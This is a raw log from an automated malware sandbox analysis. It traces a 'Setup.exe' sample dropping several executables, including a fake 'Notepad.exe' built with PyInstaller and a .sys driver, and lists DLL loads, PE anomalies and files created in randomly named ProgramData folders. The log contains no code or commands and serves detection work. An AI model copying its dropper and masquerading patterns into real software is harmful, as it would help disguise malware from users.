Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Section loaded: python3.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Section loaded: libffi-8.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: version.dll
Source: C:\Users\user\Notepad.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Notepad.exe Section loaded: python3.dll
Source: C:\Users\user\Notepad.exe Section loaded: libffi-8.dll
Source: C:\Users\user\Notepad.exe Section loaded: propsys.dll
Source: C:\Users\user\Notepad.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Notepad.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Notepad.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Notepad.exe Section loaded: amsi.dll
Source: C:\Users\user\Notepad.exe Section loaded: userenv.dll
Source: C:\Users\user\Notepad.exe Section loaded: profapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Section loaded: apphelp.dll
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Notepad.exe Section loaded: version.dll
Source: C:\Users\user\Notepad.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Notepad.exe Section loaded: python3.dll
Source: C:\Users\user\Notepad.exe Section loaded: libffi-8.dll
Source: C:\Users\user\Notepad.exe Section loaded: propsys.dll
Source: C:\Users\user\Notepad.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Notepad.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Notepad.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Notepad.exe Section loaded: amsi.dll
Source: C:\Users\user\Notepad.exe Section loaded: userenv.dll
Source: C:\Users\user\Notepad.exe Section loaded: profapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Notepad.exe Section loaded: version.dll
Source: C:\Users\user\Notepad.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Notepad.exe Section loaded: python3.dll
Source: C:\Users\user\Notepad.exe Section loaded: libffi-8.dll
Source: C:\Users\user\Notepad.exe Section loaded: propsys.dll
Source: C:\Users\user\Notepad.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Notepad.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Notepad.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Notepad.exe Section loaded: amsi.dll
Source: C:\Users\user\Notepad.exe Section loaded: userenv.dll
Source: C:\Users\user\Notepad.exe Section loaded: profapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Setup.exe Static file information: File size 13096960 > 1048576
Source: Setup.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xc7c800
Source: fix.exe.0.dr Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
Source: etc test.exe.0.dr Static PE information: section name: .00cfg
Source: hamburger.exe.0.dr Static PE information: section name: .00cfg
Source: Notepad.exe.0.dr Static PE information: section name: _RDATA
Source: tubpxzvwmyfr.exe.3.dr Static PE information: section name: .00cfg
Source: VCRUNTIME140.dll.6.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.6.dr Static PE information: section name: _RDATA
Source: libcrypto-3.dll.6.dr Static PE information: section name: .00cfg
Source: python312.dll.6.dr Static PE information: section name: PyRuntim
Source: esfowblknspo.exe.8.dr Static PE information: section name: .00cfg
Source: Notepad.exe.13.dr Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.18.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.18.dr Static PE information: section name: _RDATA
Source: libcrypto-3.dll.18.dr Static PE information: section name: .00cfg
Source: python312.dll.18.dr Static PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.47.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.47.dr Static PE information: section name: _RDATA
Source: libcrypto-3.dll.47.dr Static PE information: section name: .00cfg
Source: python312.dll.47.dr Static PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.56.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.56.dr Static PE information: section name: _RDATA
Source: libcrypto-3.dll.56.dr Static PE information: section name: .00cfg
Source: python312.dll.56.dr Static PE information: section name: PyRuntim
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_03376F1A pushad ; ret 1_2_03376F23
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Code function: 3_2_00007FF7010C1394 push qword ptr [00007FF7010CA004h]; ret 3_2_00007FF7010C1403
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Code function: 8_2_00007FF68CC61394 push qword ptr [00007FF68CC6B004h]; ret 8_2_00007FF68CC61403
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_06351810 push es; ret 10_2_06351820
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0AD3E8 push rbp; iretd 13_2_00007FFE0C0AD3ED
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0AD3E8 push rbp; iretd 19_2_00007FFE0C0AD3ED
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Code function: 38_2_00007FF7A81D1394 push qword ptr [00007FF7A81DB004h]; ret 38_2_00007FF7A81D1403
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Code function: 43_2_00007FF7ECBC1394 push qword ptr [00007FF7ECBCA004h]; ret 43_2_00007FF7ECBC1403
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE1322D3E8 push rbp; iretd 48_2_00007FFE1322D3ED
Source: C:\Windows\System32\conhost.exe Code function: 52_2_0000000140001394 push qword ptr [0000000140009004h]; ret 52_2_0000000140001403
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB2D3E8 push rbp; iretd 57_2_00007FFE0EB2D3ED

Persistence and Installation Behavior

Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe File created: C:\Windows\TEMP\trxhxvjzqipl.sys
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\libffi-8.dll
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\libffi-8.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\select.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_lzma.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_hashlib.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_decimal.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\unicodedata.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_bz2.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_socket.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_socket.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\select.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\libcrypto-3.dll
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\mergedALL.exe
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_socket.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\VCRUNTIME140.dll
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_lzma.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_wmi.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_ctypes.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_bz2.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_wmi.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_ctypes.pyd
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe File created: C:\Windows\Temp\trxhxvjzqipl.sys
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\select.pyd
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\fix.exe
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\etc test.exe
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_decimal.pyd
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\hamburger.exe
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_bz2.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\python312.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\libffi-8.dll
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\python312.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\python312.dll
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\libcrypto-3.dll
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_wmi.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_hashlib.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_decimal.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\Notepad.exe
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_ctypes.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\libcrypto-3.dll
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\VCRUNTIME140.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_hashlib.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\select.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_socket.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\unicodedata.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_decimal.pyd
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\VCRUNTIME140.dll
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\python312.dll
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe File created: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_ctypes.pyd
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_lzma.pyd
